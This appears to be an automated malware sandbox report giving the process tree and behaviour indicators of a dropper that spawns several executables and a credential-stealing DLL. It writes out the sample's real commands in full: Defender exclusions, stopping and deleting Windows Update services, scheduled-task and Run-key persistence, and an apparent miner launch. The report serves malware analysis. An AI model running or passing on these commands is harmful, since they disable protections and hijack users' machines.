
pid process

2596 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

ChromeSetup.exe

pid process

1428 ChromeSetup.exe

pid	process
2596	Explorer.EXE

pid	process
656

pid	process
1428	ChromeSetup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

birges.exeExplorer.EXEpowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	5004	birges.exe
Token: SeShutdownPrivilege	2596	Explorer.EXE
Token: SeCreatePagefilePrivilege	2596	Explorer.EXE
Token: SeShutdownPrivilege	2596	Explorer.EXE
Token: SeCreatePagefilePrivilege	2596	Explorer.EXE
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeShutdownPrivilege	3608	powercfg.exe
Token: SeCreatePagefilePrivilege	3608	powercfg.exe
Token: SeShutdownPrivilege	1388	powercfg.exe
Token: SeCreatePagefilePrivilege	1388	powercfg.exe
Token: SeShutdownPrivilege	3348	powercfg.exe
Token: SeCreatePagefilePrivilege	3348	powercfg.exe
Token: SeShutdownPrivilege	2848	powercfg.exe
Token: SeCreatePagefilePrivilege	2848	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4800	powershell.exe
Token: SeSecurityPrivilege	4800	powershell.exe
Token: SeTakeOwnershipPrivilege	4800	powershell.exe
Token: SeLoadDriverPrivilege	4800	powershell.exe
Token: SeSystemProfilePrivilege	4800	powershell.exe
Token: SeSystemtimePrivilege	4800	powershell.exe
Token: SeProfSingleProcessPrivilege	4800	powershell.exe
Token: SeIncBasePriorityPrivilege	4800	powershell.exe
Token: SeCreatePagefilePrivilege	4800	powershell.exe
Token: SeBackupPrivilege	4800	powershell.exe
Token: SeRestorePrivilege	4800	powershell.exe
Token: SeShutdownPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeSystemEnvironmentPrivilege	4800	powershell.exe
Token: SeRemoteShutdownPrivilege	4800	powershell.exe
Token: SeUndockPrivilege	4800	powershell.exe
Token: SeManageVolumePrivilege	4800	powershell.exe
Token: 33	4800	powershell.exe
Token: 34	4800	powershell.exe
Token: 35	4800	powershell.exe
Token: 36	4800	powershell.exe
Token: SeIncreaseQuotaPrivilege	4800	powershell.exe
Token: SeSecurityPrivilege	4800	powershell.exe
Token: SeTakeOwnershipPrivilege	4800	powershell.exe
Token: SeLoadDriverPrivilege	4800	powershell.exe
Token: SeSystemProfilePrivilege	4800	powershell.exe
Token: SeSystemtimePrivilege	4800	powershell.exe
Token: SeProfSingleProcessPrivilege	4800	powershell.exe
Token: SeIncBasePriorityPrivilege	4800	powershell.exe
Token: SeCreatePagefilePrivilege	4800	powershell.exe
Token: SeBackupPrivilege	4800	powershell.exe
Token: SeRestorePrivilege	4800	powershell.exe
Token: SeShutdownPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeSystemEnvironmentPrivilege	4800	powershell.exe
Token: SeRemoteShutdownPrivilege	4800	powershell.exe
Token: SeUndockPrivilege	4800	powershell.exe
Token: SeManageVolumePrivilege	4800	powershell.exe
Token: 33	4800	powershell.exe
Token: 34	4800	powershell.exe
Token: 35	4800	powershell.exe
Token: 36	4800	powershell.exe
Token: SeIncreaseQuotaPrivilege	4800	powershell.exe
Token: SeSecurityPrivilege	4800	powershell.exe
Token: SeTakeOwnershipPrivilege	4800	powershell.exe
Token: SeLoadDriverPrivilege	4800	powershell.exe
Token: SeSystemProfilePrivilege	4800	powershell.exe
Token: SeSystemtimePrivilege	4800	powershell.exe
Token: SeProfSingleProcessPrivilege	4800	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

3380 rundll32.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Explorer.EXE

pid process

2596 Explorer.EXE
2596 Explorer.EXE

pid	process
3380	rundll32.exe

pid	process
2596	Explorer.EXE
2596	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

83baf716c50b90d398e1285d0c8c04c8.exePlayer3.exenbveek.exeddli.execmd.exebirges.exe

description	pid	process	target process
PID 984 wrote to memory of 1932	984	83baf716c50b90d398e1285d0c8c04c8.exe	Player3.exe
PID 984 wrote to memory of 1932	984	83baf716c50b90d398e1285d0c8c04c8.exe	Player3.exe
PID 984 wrote to memory of 1932	984	83baf716c50b90d398e1285d0c8c04c8.exe	Player3.exe
PID 984 wrote to memory of 804	984	83baf716c50b90d398e1285d0c8c04c8.exe	pb1111.exe
PID 984 wrote to memory of 804	984	83baf716c50b90d398e1285d0c8c04c8.exe	pb1111.exe
PID 984 wrote to memory of 3708	984	83baf716c50b90d398e1285d0c8c04c8.exe	ddli.exe
PID 984 wrote to memory of 3708	984	83baf716c50b90d398e1285d0c8c04c8.exe	ddli.exe
PID 984 wrote to memory of 3708	984	83baf716c50b90d398e1285d0c8c04c8.exe	ddli.exe
PID 1932 wrote to memory of 3984	1932	Player3.exe	nbveek.exe
PID 1932 wrote to memory of 3984	1932	Player3.exe	nbveek.exe
PID 1932 wrote to memory of 3984	1932	Player3.exe	nbveek.exe
PID 984 wrote to memory of 5004	984	83baf716c50b90d398e1285d0c8c04c8.exe	birges.exe
PID 984 wrote to memory of 5004	984	83baf716c50b90d398e1285d0c8c04c8.exe	birges.exe
PID 3984 wrote to memory of 1068	3984	nbveek.exe	schtasks.exe
PID 3984 wrote to memory of 1068	3984	nbveek.exe	schtasks.exe
PID 3984 wrote to memory of 1068	3984	nbveek.exe	schtasks.exe
PID 3984 wrote to memory of 4948	3984	nbveek.exe	cmd.exe
PID 3984 wrote to memory of 4948	3984	nbveek.exe	cmd.exe
PID 3984 wrote to memory of 4948	3984	nbveek.exe	cmd.exe
PID 3708 wrote to memory of 4528	3708	ddli.exe	ddli.exe
PID 3708 wrote to memory of 4528	3708	ddli.exe	ddli.exe
PID 3708 wrote to memory of 4528	3708	ddli.exe	ddli.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 2300	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 3380	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 3380	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 3380	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 1796	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 1796	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 1796	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 4732	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 4732	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 4732	4948	cmd.exe	cmd.exe
PID 4948 wrote to memory of 3172	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 3172	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 3172	4948	cmd.exe	cacls.exe
PID 5004 wrote to memory of 3808	5004	birges.exe	ngentask.exe
PID 5004 wrote to memory of 3808	5004	birges.exe	ngentask.exe
PID 4948 wrote to memory of 4612	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 4612	4948	cmd.exe	cacls.exe
PID 4948 wrote to memory of 4612	4948	cmd.exe	cacls.exe
PID 5004 wrote to memory of 4580	5004	birges.exe	EdmGen.exe
PID 5004 wrote to memory of 4580	5004	birges.exe	EdmGen.exe
PID 5004 wrote to memory of 5084	5004	birges.exe	aspnet_state.exe
PID 5004 wrote to memory of 5084	5004	birges.exe	aspnet_state.exe
PID 5004 wrote to memory of 1760	5004	birges.exe	aspnet_regsql.exe
PID 5004 wrote to memory of 1760	5004	birges.exe	aspnet_regsql.exe
PID 5004 wrote to memory of 2492	5004	birges.exe	cvtres.exe
PID 5004 wrote to memory of 2492	5004	birges.exe	cvtres.exe
PID 5004 wrote to memory of 4432	5004	birges.exe	mscorsvw.exe
PID 5004 wrote to memory of 4432	5004	birges.exe	mscorsvw.exe
PID 5004 wrote to memory of 1856	5004	birges.exe	SMSvcHost.exe
PID 5004 wrote to memory of 1856	5004	birges.exe	SMSvcHost.exe
PID 5004 wrote to memory of 4376	5004	birges.exe	AppLaunch.exe
PID 5004 wrote to memory of 4376	5004	birges.exe	AppLaunch.exe
PID 5004 wrote to memory of 1872	5004	birges.exe	Microsoft.Workflow.Compiler.exe
PID 5004 wrote to memory of 1872	5004	birges.exe	Microsoft.Workflow.Compiler.exe
PID 5004 wrote to memory of 4992	5004	birges.exe	MSBuild.exe
PID 5004 wrote to memory of 4992	5004	birges.exe	MSBuild.exe
PID 5004 wrote to memory of 4456	5004	birges.exe	AddInProcess.exe
PID 5004 wrote to memory of 4456	5004	birges.exe	AddInProcess.exe
PID 5004 wrote to memory of 4420	5004	birges.exe	DataSvcUtil.exe
PID 5004 wrote to memory of 4420	5004	birges.exe	DataSvcUtil.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2596

C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe
"C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:984

C:\Users\Admin\AppData\Local\Temp\Player3.exe
"C:\Users\Admin\AppData\Local\Temp\Player3.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
5⤵
- Creates scheduled task(s)
PID:1068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:2300

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
6⤵
PID:3380

C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
6⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:4732

C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:N"
6⤵
PID:3172

C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:R" /E
6⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"
5⤵
- Executes dropped EXE
PID:2976

C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2368

C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h
6⤵
- Executes dropped EXE
PID:1932

C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:4648

C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1428

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
5⤵
- Loads dropped DLL
PID:4612

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
6⤵
- Loads dropped DLL
PID:2116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2116 -s 692
7⤵
- Program crash
PID:4856

C:\Users\Admin\AppData\Local\Temp\pb1111.exe
"C:\Users\Admin\AppData\Local\Temp\pb1111.exe"
3⤵
- Executes dropped EXE
PID:804

C:\Users\Admin\AppData\Local\Temp\ddli.exe
"C:\Users\Admin\AppData\Local\Temp\ddli.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3708

C:\Users\Admin\AppData\Local\Temp\ddli.exe
"C:\Users\Admin\AppData\Local\Temp\ddli.exe" -h
4⤵
- Executes dropped EXE
PID:4528

C:\Users\Admin\AppData\Local\Temp\birges.exe
"C:\Users\Admin\AppData\Local\Temp\birges.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
4⤵
PID:3808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
4⤵
PID:4580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
4⤵
PID:1760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
4⤵
PID:5084

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
4⤵
PID:2492

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
4⤵
PID:4432

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
4⤵
PID:1856

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
4⤵
PID:4376

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
4⤵
PID:1872

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
4⤵
PID:4992

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
4⤵
PID:4456

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
4⤵
PID:4420

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
4⤵
PID:4624

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
4⤵
PID:2712

C:\Users\Admin\AppData\Local\Temp\8D9A.exe
C:\Users\Admin\AppData\Local\Temp\8D9A.exe
2⤵
- Executes dropped EXE
PID:2564

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:1264

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23736
4⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 400
3⤵
- Program crash
PID:3400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3660

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4336

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1524

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:760

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1016

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2752

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:960

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3408

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1700

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1456

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3584

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2052

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3348

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
PID:1476

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:2372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1448

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:2764

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5004

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4876

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4660

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3676

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4148

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:640

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4152

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:4804

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2012

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4512

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2572

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:2332

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5008

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:344

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:760

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:4364

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:4776

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:4952

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
2⤵
- Modifies data under HKEY_USERS
PID:1384

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:2240

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 600
3⤵
- Program crash
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 4884
1⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:3700

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1696

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 572
3⤵
- Program crash
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 832 -ip 832
1⤵
PID:3680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 2116 -ip 2116
1⤵
PID:1764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2564 -ip 2564
1⤵
PID:1432

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3560

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
